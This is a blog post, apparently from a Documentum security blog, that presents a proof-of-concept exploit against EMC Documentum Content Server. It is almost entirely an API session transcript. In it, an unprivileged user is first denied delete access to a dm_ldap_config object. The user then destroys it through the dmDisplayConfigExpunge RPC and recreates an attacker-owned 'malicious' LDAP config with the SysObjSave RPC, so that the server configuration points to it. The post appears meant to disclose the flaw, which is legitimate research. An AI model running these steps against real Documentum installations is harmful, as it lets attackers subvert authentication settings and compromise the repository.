Is it possible to compromise Documentum by deleting object? Solution

The solution is based on a fact, that Content Server fails to properly maintain references between objects, for example, attacker is able to delete and create his own dm_ldap_config object:

--
-- configuring dm_ldap_config and dm_server_config
-- under superuser account
--
API> create,c,dm_ldap_config
...
0801ffd7805ca7ff
API> save,c,l
...
OK
API> retrieve,c,dm_server_config
...
3d01ffd780000102
API> set,c,l,ldap_config_id
SET> 0801ffd7805ca7ff
...
OK
API> save,c,l
...
OK
API> connect,ssc_dev,test01,test01
...
s1
--
-- attacker is unable to modify dm_ldap_config_object
--
API> destroy,c,0801ffd7805ca7ff
...
[DM_SYSOBJECT_E_NO_DELETE_ACCESS]error:  
    "No delete access for sysobject named ''"

API> save,c,0801ffd7805ca7ff
...
[DM_SYSOBJECT_E_NO_WRITE_ACCESS]error:  
    "No write access for sysobject named ''."


API> get,c,0801ffd7805ca7ff,i_vstamp
...
0
--
-- but attacker is able to delete dm_ldap_config object
-- using dmDisplayConfigExpunge RPC command
--
API> apply,c,0801ffd7805ca7ff,dmDisplayConfigExpunge,
       OBJECT_TYPE,S,dm_ldap_config,i_vstamp,I,0
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : T

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
--
-- dm_ldap_config object got deleted
--
API> revert,c,0801ffd7805ca7ff
...
[DM_API_E_EXIST]error:  
  "Document/object specified by 0801ffd7805ca7ff does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
   "Cannot fetch a sysobject - Invalid object ID : 0801ffd7805ca7ff"

[DM_API_E_EXIST]error:  
   "Document/object specified by 0801ffd7805ca7ff does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
   "Cannot fetch a sysobject - Invalid object ID : 0801ffd7805ca7ff"

[DM_OBJ_MGR_E_FETCH_FAIL]error:  
   "attempt to fetch object with handle 0801ffd7805ca7ff failed"

--
-- now attacker creates his own dm_ldap_config object
--
API>apply,c,0801ffd7805ca7ff,SysObjSave,
       OBJECT_TYPE,S,dm_ldap_config,
       IS_NEW_OBJECT,B,T,
       i_vstamp,I,0,
       object_name,S,malicious,
       i_has_folder,B,T,
       r_object_type,S,dm_ldap_config,
       owner_name,S,test01,
       owner_permit,I,7
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 1

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> revert,c,0801ffd7805ca7ff
...
OK
API> dump,c,0801ffd7805ca7ff
...
USER ATTRIBUTES

  object_name                     : malicious
  title                           :
  subject                         :

API> save,c,0801ffd7805ca7ff
...
OK
--
-- now dm_server_config references to
-- malicious dm_ldap_config object 
--
API> revert,c,3d01ffd780000102
...
OK
API> get,c,l,ldap_config_id
...
0801ffd7805ca7ff

One thought on “Is it possible to compromise Documentum by deleting object? Solution

  1. Pingback: Trap for negligent developer | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s